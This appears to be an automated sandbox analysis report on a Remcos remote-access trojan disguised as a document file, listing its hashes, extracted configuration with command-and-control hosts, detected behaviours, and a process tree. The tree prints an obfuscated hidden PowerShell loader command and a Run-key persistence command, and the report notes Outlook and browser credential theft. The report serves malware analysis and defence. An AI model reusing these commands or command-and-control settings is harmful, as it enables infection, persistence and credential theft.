Overview

overview

10

Static

static

1

CAD_DETAIL...21.exe

windows7-x64

8

CAD_DETAIL...21.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 13:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe

  • Size

    643KB

  • MD5

    5cba30723bcacc171aa6417869f5981c

  • SHA1

    a8abaf40ae64d44f9055d4dd3df2f91ac393ecc1

  • SHA256

    d20dae11fd9de533d5ba84666b26dbf233161d991643d2de08fd043699cddbcc

  • SHA512

    6ebb1d4f664933e6f063759c2a615feb72ef250b5a0ec0f3f9775868bacc661931ee64e9ae943db6f58a43b08eac7350a1f511ebf97620356bc504e81d78c431

  • SSDEEP

    12288:llLIJdKsaouLbYCjUnmITaCQwN44mlIc4G66Jg1KCe4sEftmU3BgKiC:lSJaouPYComqa6fcx66Jg16EfthGC

Score
10/10
remcosspredecollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

SPREDE

C2

oaziamaka111.duckdns.org:4689

oaziamaka111.duckdns.org:4688

oaziamaka222.duckdns.org:4689

oaziamaka222.duckdns.org:4688
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    aleopty.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    deokloksgb-NAYJ41

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
    "C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Topskuddene=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Panics.End';$Flygtningebaggrund=$Topskuddene.SubString(72585,3);.$Flygtningebaggrund($Topskuddene)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4300
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:2084
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mfvinmk"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2752
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wzaanfvngi"
          4⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:2112
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gbgloxgpuqalx"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3168

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2k2j25u.zfc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\mfvinmk
    Filesize

    4KB

    MD5

    16dfb23eaa7972c59c36fcbc0946093b

    SHA1

    1e9e3ff83a05131575f67e202d352709205f20f8

    SHA256

    36c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c

    SHA512

    a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Mythopoet151.Gum
    Filesize

    308KB

    MD5

    95456efa53e67771a7a366a1729330a5

    SHA1

    7c6753470c3f2a1919af9608040e31404eb15955

    SHA256

    4e5986d80aa60a80b07731921a0dbb905f663de679dbc4bfe897ad27fe04555d

    SHA512

    36bd759c9e49100db6739293ccbb1508b260b5866813d085403e489ec40e86019cfccdebb6a134afdd3fe42410c53a57865ef904eefd7cd33b9944f7cb4f3d13

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Panics.End
    Filesize

    70KB

    MD5

    fa9db15fb8638e539838260c0f09078b

    SHA1

    adcb4f9c75b0120d8f0369edd71d75397bd9507f

    SHA256

    648a811ffe8215aa2f12cdfcbed2ca0efa438a628a0164e592508e56538bbd4b

    SHA512

    24412e43da7b725aad0bf64347ac718573bd3c95409cb9a1c6f90f9abb474fae46583588b7eb9943d5be829b6466007fb28cefbad59b819d88064b30205b1153

    Download Submit

  • memory/1500-52-0x0000000007BC0000-0x0000000007BC8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1500-23-0x0000000006450000-0x000000000646E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1500-11-0x0000000005D20000-0x0000000005D86000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1500-9-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-12-0x0000000005D90000-0x0000000005DF6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1500-22-0x0000000005FB0000-0x0000000006304000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1500-55-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-24-0x00000000064A0000-0x00000000064EC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1500-25-0x0000000007620000-0x00000000076B6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1500-26-0x0000000006980000-0x000000000699A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1500-27-0x00000000069D0000-0x00000000069F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1500-28-0x0000000007CB0000-0x0000000008254000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1500-7-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-30-0x00000000088E0000-0x0000000008F5A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1500-31-0x0000000007860000-0x0000000007892000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1500-35-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-43-0x00000000078A0000-0x00000000078BE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1500-32-0x000000006FCF0000-0x000000006FD3C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1500-45-0x00000000078D0000-0x0000000007973000-memory.dmp

    Filesize

    652KB

    Download

  • memory/1500-57-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-46-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-47-0x00000000079D0000-0x00000000079DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1500-48-0x0000000007B30000-0x0000000007B41000-memory.dmp

    Filesize

    68KB

    Download

  • memory/1500-49-0x0000000007B80000-0x0000000007B8E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/1500-50-0x0000000007B90000-0x0000000007BA4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/1500-51-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1500-5-0x000000007386E000-0x000000007386F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-53-0x0000000007BE0000-0x0000000007C0A000-memory.dmp

    Filesize

    168KB

    Download

  • memory/1500-54-0x0000000007C10000-0x0000000007C34000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1500-10-0x0000000005C80000-0x0000000005CA2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1500-44-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-8-0x0000000005580000-0x0000000005BA8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1500-60-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-61-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-59-0x000000007386E000-0x000000007386F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-62-0x0000000008F60000-0x000000000A029000-memory.dmp

    Filesize

    16.8MB

    Download

  • memory/1500-63-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-64-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-65-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-66-0x0000000073860000-0x0000000074010000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1500-6-0x0000000002DF0000-0x0000000002E26000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2112-78-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2112-80-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2112-74-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2752-76-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2752-73-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2752-77-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2752-79-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/3168-81-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/3168-85-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/3168-82-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4964-68-0x0000000000760000-0x00000000019B4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4964-67-0x00000000019C0000-0x0000000002A89000-memory.dmp

    Filesize

    16.8MB

    Download

  • memory/4964-89-0x000000001E9A0000-0x000000001E9B9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4964-93-0x000000001E9A0000-0x000000001E9B9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4964-92-0x000000001E9A0000-0x000000001E9B9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4964-95-0x00000000019C0000-0x0000000002A89000-memory.dmp

    Filesize

    16.8MB

    Download